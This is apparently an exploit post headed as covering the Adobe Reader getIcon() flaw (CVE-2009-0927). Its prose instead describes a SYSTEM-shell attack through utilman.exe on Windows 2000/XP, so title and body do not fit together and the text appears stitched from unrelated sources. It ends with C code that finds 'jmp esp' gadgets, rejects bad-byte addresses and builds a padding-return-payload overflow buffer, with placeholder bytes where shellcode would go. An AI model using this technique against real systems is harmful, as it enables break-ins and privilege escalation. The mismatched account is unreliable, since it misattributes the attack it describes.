Exploit and technical report about the Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927).
Back again with a cutie exploit, it avoids losing time with password sniffing/cracking :). The exploit executes a shell through utilman.exe with SYSTEM privileges. Use it from a graphical interface (rdp/vnc/radmin/etc) or directly with physical access.
So, the most interesting thing is how to make it become universal, writing 'jmp esp's in memory.. I don't think it will work in many circumstances, like what the server is doing, how many people are logged on, the connection limit, etc.. But I think we can find a nice ret value, based on how many connections were successful, or doing something to always have our FF E4 (jmp esp) at a fixed place in memory.
8 of 10 win2k hosts tested were successfully exploited. It works for winXP too but with 3 variants; the 0 and 1 are the most common, 2 was reported only by one winXP sp0. No variants for win2k because the ret addr found works at 80% :P
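The ret-value problem described above is usually attacked by scanning a module that is loaded at a stable address for an existing FF E4 ("jmp esp") gadget, then discarding any candidate address that contains bytes the vulnerable copy would stop at or mangle (0x00, 0x0A, 0x0D). The following is an added example, not the exploit author's code: the module image is a constructed byte array, not a real DLL dump, and SAMPLE_BASE is a hypothetical load address. It scans for the gadget, filters by bad bytes, and lays out the classic [padding][ret][payload] buffer whose saved-EIP slot points at the gadget so that ESP lands on the payload.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for a loaded module image (NOT a real dump).
 * "jmp esp" encodes as FF E4; copies are planted at offsets 2, 7 and 10. */
static const uint8_t sample_image[] = {
    0x90, 0x90, 0xFF, 0xE4, 0x55, 0x8B, 0xEC,
    0xFF, 0xE4, 0xC3, 0xFF, 0xE4, 0x00,
};
/* Hypothetical load address of the sample image. */
#define SAMPLE_BASE 0x7C8A1000u

/* Scan img for FF E4 and store the absolute address of each hit in out.
 * Returns the number of hits stored (at most max_out). */
size_t find_jmp_esp(const uint8_t *img, size_t len, uint32_t base,
                    uint32_t *out, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len && n < max_out; i++) {
        if (img[i] == 0xFF && img[i + 1] == 0xE4)
            out[n++] = base + (uint32_t)i;
    }
    return n;
}

/* True if no byte of addr appears in the bad-byte list. */
int addr_avoids(uint32_t addr, const uint8_t *bad, size_t nbad)
{
    for (int shift = 0; shift < 32; shift += 8) {
        uint8_t b = (uint8_t)(addr >> shift);
        for (size_t j = 0; j < nbad; j++)
            if (b == bad[j]) return 0;
    }
    return 1;
}

/* First jmp esp address in img that avoids the bad bytes, or 0 if none. */
uint32_t pick_ret_addr(const uint8_t *img, size_t len, uint32_t base,
                       const uint8_t *bad, size_t nbad)
{
    uint32_t hits[64];
    size_t n = find_jmp_esp(img, len, base, hits, 64);
    for (size_t i = 0; i < n; i++)
        if (addr_avoids(hits[i], bad, nbad)) return hits[i];
    return 0;
}

/* Lay out [padding][ret][payload]. ret overwrites the saved EIP; after the
 * ret instruction ESP points just past it, so a jmp esp at ret lands on
 * the payload. Returns the total length, or 0 if cap is too small. */
size_t build_overflow(uint8_t *out, size_t cap, size_t pad_len, uint32_t ret,
                      const uint8_t *payload, size_t plen)
{
    size_t need = pad_len + 4 + plen;
    if (need > cap) return 0;
    memset(out, 'A', pad_len);
    out[pad_len + 0] = (uint8_t)(ret);         /* little-endian on x86 */
    out[pad_len + 1] = (uint8_t)(ret >> 8);
    out[pad_len + 2] = (uint8_t)(ret >> 16);
    out[pad_len + 3] = (uint8_t)(ret >> 24);
    memcpy(out + pad_len + 4, payload, plen);
    return need;
}

int main(void)
{
    const uint8_t bad[] = { 0x00, 0x0A, 0x0D };
    const uint8_t payload[] = { 0xCC, 0xCC, 0xCC, 0xCC }; /* INT3 placeholders, not shellcode */
    uint8_t buf[256];
    uint32_t ret = pick_ret_addr(sample_image, sizeof sample_image, SAMPLE_BASE,
                                 bad, sizeof bad);
    size_t n = build_overflow(buf, sizeof buf, 64, ret, payload, sizeof payload);
    printf("ret=0x%08x buffer=%zu bytes\n", ret, n);
    return 0;
}
```

With the constructed image the third hit (0x7C8A100A) is rejected because its low byte is a line feed, which matters for any line-oriented protocol; the first hit is chosen. On a real target the image would be read from the module actually loaded on the victim, and the padding length would come from the crash offset.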